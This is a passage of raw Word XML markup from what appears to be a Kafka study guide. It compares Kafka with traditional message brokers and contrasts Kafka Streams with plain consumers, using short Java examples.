        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka makes use of a zero-copy technology, which reduces disk I/O overhead and improves overall performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0210397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43793FE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derate Throughput</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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While traditional messaging systems can handle moderate latency, they are not designed for ultra-low-latency message processing, especially when dealing with large volumes of data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6399B6D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hallenges</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The performance of traditional systems can degrade when scaling horizontally, as adding more nodes usually involves more complex coordination and state management.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B076651"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BE48AA">
          <v:rect id="_x0000_i3402" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="05ECE49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777"/>
        <w:gridCol w:w="4477"/>
      </w:tblGrid>
      <w:tr w:rsidR="0003272F" w:rsidRPr="0003272F" w14:paraId="64B3A2C1" w14:textId="77777777" w:rsidTr="00A17F31">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6C0AC41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741229A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tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="77D5EB5F"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tc>
      </w:tr>
      <w:tr w:rsidR="0003272F" w:rsidRPr="0003272F" w14:paraId="075874FE" w14:textId="77777777" w:rsidTr="00A17F31">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5A77C11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3F36AC27"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artitioned, and replicated brokers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2F771B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entralized brokers or simple queues/topics</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0003272F" w:rsidRPr="0003272F" w14:paraId="572D286F" w14:textId="77777777" w:rsidTr="00A17F31">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="678CE9FF"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urability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="23F9BE8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based, configurable retention, persistent storage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3F0FAB5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be durable, but often message removed after consumption</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0003272F" w:rsidRPr="0003272F" w14:paraId="3FD9B3ED" w14:textId="77777777" w:rsidTr="00A17F31">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7A74FF84"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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="757B58F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rizontally scalable, partitions for load balancing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="18102EA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ertical scaling, more complex horizontal scaling</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0003272F" w:rsidRPr="0003272F" w14:paraId="29A770FD" w14:textId="77777777" w:rsidTr="00A17F31">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1DD851F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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0ECDDD95"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 throughput, low latency, log-structured, zero-copy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0ABA56F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derate throughput, higher latency, less optimized for large-scale</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0003272F" w:rsidRPr="0003272F" w14:paraId="4D589F8C" w14:textId="77777777" w:rsidTr="00A17F31">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="17A66E4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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="66E187DC"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 streaming, log aggregation, real-time analytics</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7525FC9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ask queuing, pub/sub, message routing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5BEDA496"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66DCF">
          <v:rect id="_x0000_i3403" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="46CFE974"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13BF49D"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excels in environments that require </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>high-throughput</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where retaining the full history of events or stream processing is crucial.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6423ECF8"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ditional messaging systems</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> like </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>RabbitMQ</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ActiveMQ</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are better suited for </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>point-to-point messag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ub/sub models</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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CE4B95"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404" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC2BA63" w14:textId="59A359BF"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47" w:name="_Toc197868061"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What are Kafka Streams, and how are they different from regular Kafka consumers</w:t>
      </w:r>
      <w:r w:rsidR="007C61B8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="847"/>
    </w:p>
    <w:p w14:paraId="2A7E3921" w14:textId="1BB5CEC7" w:rsidR="00B63B45" w:rsidRPr="0003272F" w:rsidRDefault="00B63B4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Overview:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47626FD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for building real-time stream processing applications that process data stored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It enables developers to perform complex transformations and aggregations of data directly within Kafka, making it suitable for processing large volumes of data in real time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2668940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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D041B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level API</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka Streams provides a functional API to define transformations on Kafka topics, such as filtering, grouping, joining, and aggregating.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D75CF04"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benefits from Kafka’s fault tolerance and distributed nature. It provides automatic handling of failures and retries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B939581"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You can perform both stateful (e.g., joins, aggregations) and stateless operations (e.g., filtering, mapping) on streams.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67DB79E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Kafka Streams can scale horizontally by adding more instances to process data in parallel.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69DFD56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windowing, allowing you to process data over specific time periods (e.g., tumbling or sliding windows).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B0AA56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works directly with Kafka topics and Kafka brokers, making it simple to implement stream processing without needing a separate infrastructure like Apache Flink or Apache Spark.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7277A00D"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w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka Streams provides the ability to process messages with exactly-once semantics (EOS), ensuring no duplication or data loss during processing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="724411CC"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794683">
          <v:rect id="_x0000_i3405" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="386BC1B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328"/>
        <w:gridCol w:w="3931"/>
      </w:tblGrid>
      <w:tr w:rsidR="0003272F" w:rsidRPr="0003272F" w14:paraId="73ABEB05" w14:textId="77777777" w:rsidTr="00B63B45">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="18F32DAC"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spect</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="442BEF0F"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647EE88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s</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0003272F" w:rsidRPr="0003272F" w14:paraId="4AFC6615" w14:textId="77777777" w:rsidTr="00B63B45">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2564067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957FEF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signed for stream processing applications (real-time data processing, transformations).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0FDDCC8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for consuming messages from Kafka topics for processing or other uses.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0003272F" w:rsidRPr="0003272F" w14:paraId="6F387531" w14:textId="77777777" w:rsidTr="00B63B45">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4FE503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1FD576B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upport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processing (aggregations, joins, etc.).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5B372FF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ypically used for stateless consumption and processing of messages.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0003272F" w:rsidRPr="0003272F" w14:paraId="4E1B8704" w14:textId="77777777" w:rsidTr="00B63B45">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="63F4BDC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F225BF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can maintain state (e.g., in a local store) to enable operations like windowing, joins, and aggregations.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="242F855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nage state on their own, they just consume messages.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0003272F" w:rsidRPr="0003272F" w14:paraId="56431666" w14:textId="77777777" w:rsidTr="00B63B45">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="11177C9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 State Stores</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4D12B7E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an in-built key-value store to persist the state across restarts and handle stateful operations.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6225914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internal state across invocations.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0003272F" w:rsidRPr="0003272F" w14:paraId="6AEE2553" w14:textId="77777777" w:rsidTr="00B63B45">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="66BF3D7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51A4F197"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from Kafka's inherent fault-tolerant architecture.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3FD50A0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have internal recovery features.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0003272F" w:rsidRPr="0003272F" w14:paraId="1898E6E5" w14:textId="77777777" w:rsidTr="00B63B45">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4D1AD43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194D285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pplications can scale horizontally across multiple instances. It uses Kafka's partitioning to distribute processing.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4012497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an consume from multiple partitions, but parallelism and scaling have to be managed manually.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0003272F" w:rsidRPr="0003272F" w14:paraId="69788953" w14:textId="77777777" w:rsidTr="00B63B45">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3CDEAD6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45AFADA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 Once Semantics (EOS)</w:t>
            </w:r>
            <w:r w:rsidRPr="0003272F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>, ensuring no message duplication or data loss in processing.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7FA49F1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don’t support EOS by default; they may rely on manual offset management to ensure processing reliability.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0003272F" w:rsidRPr="0003272F" w14:paraId="701D702E" w14:textId="77777777" w:rsidTr="00B63B45">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5039301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3CF77EC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onsume messages from Kafka topics but don’t automatically produce processed results back into Kafka (unless explicitly coded).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0003272F" w:rsidRPr="0003272F" w14:paraId="452E648D" w14:textId="77777777" w:rsidTr="00B63B45">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3465975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evelopment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="386AA29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require developers to handle most of the fault tolerance, offset management, and integration complexities manually.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1FD443D3"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292D127">
          <v:rect id="_x0000_i3406" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D3ABDE2"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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="419364D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using Kafka Streams to process a stream of data:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E9048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Builder builder = new StreamsBuilder();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="103A196A" w14:textId="77777777" w:rsidR="00B63B45" w:rsidRPr="0003272F" w:rsidRDefault="00B63B45" w:rsidP="0003272F">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FEDB2D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Define a simple stream processing operation: map each message to uppercase</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF329A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sourceStream = builder.stream("input-topic");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1791474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transformedStream = sourceStream.mapValues(value -&gt; value.toUpperCase());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6757F7" w14:textId="77777777" w:rsidR="00B63B45" w:rsidRPr="0003272F" w:rsidRDefault="00B63B45" w:rsidP="0003272F">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06A65FE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end the processed data to an output topic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37BA954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formedStream.to("output-topic");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BFCEB7B" w14:textId="77777777" w:rsidR="00B63B45" w:rsidRPr="0003272F" w:rsidRDefault="00B63B45" w:rsidP="0003272F">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00E293B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treams streams = new KafkaStreams(builder.build(), properties);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4AB3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start();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD4CF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6E9C88">
          <v:rect id="_x0000_i3407" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A611FC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 Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B0D830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mparison, a regular Kafka consumer might look like this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5068FDC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6DDCCA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input-topic"));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66023149" w14:textId="77777777" w:rsidR="00B63B45" w:rsidRPr="0003272F" w:rsidRDefault="00B63B45" w:rsidP="0003272F">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D29A3F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183605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0));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6814CDE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012B723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each record here</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC90E9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0E412DD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589647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2DFA8E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e regular consumer example, the consumer simply reads messages from the input-topic and processes them. There's no transformation, fault tolerance, or state management like in Kafka Streams.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496096CA"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805AB">
          <v:rect id="_x0000_i3408" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1985A58B"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72C7706"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409" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7EEF22" w14:textId="25C53CF3"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848" w:name="_Toc197868062"/>
      <w:r w:rsidRPr="00CE4B9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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="848"/>
    </w:p>
    <w:p w14:paraId="45774EC2" w14:textId="5471EC4A" w:rsidR="00C34B0B" w:rsidRPr="0003272F" w:rsidRDefault="00C34B0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API Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D15403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 API:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D36D688"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 Processing</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka Streams supports a range of transformations such as filtering, mapping, and aggregation to process streams of data in real-time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD10982"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xml:space="preserve">: It allow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operations (e.g., joins, aggregations)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operations (e.g., filtering, mapping).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D669280"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 Streams supports exactly-once processing semantics (EOS), which ensures that each record is processed exactly once and no data loss occurs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="530EFCE9"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r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka Streams leverages Kafka’s distributed architecture, which enables applications to scale horizontally by adding more instances of the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01094A45"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various types of windowing (e.g., tumbling, hopping), which allows developers to perform operations over fixed-size or sliding windows of time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3FF54F"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s fully integrated with Kafka topics and brokers, allowing for easy data ingestion and production without needing an additional cluster.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B2B8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Use Cases:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0162E08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Analytics</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
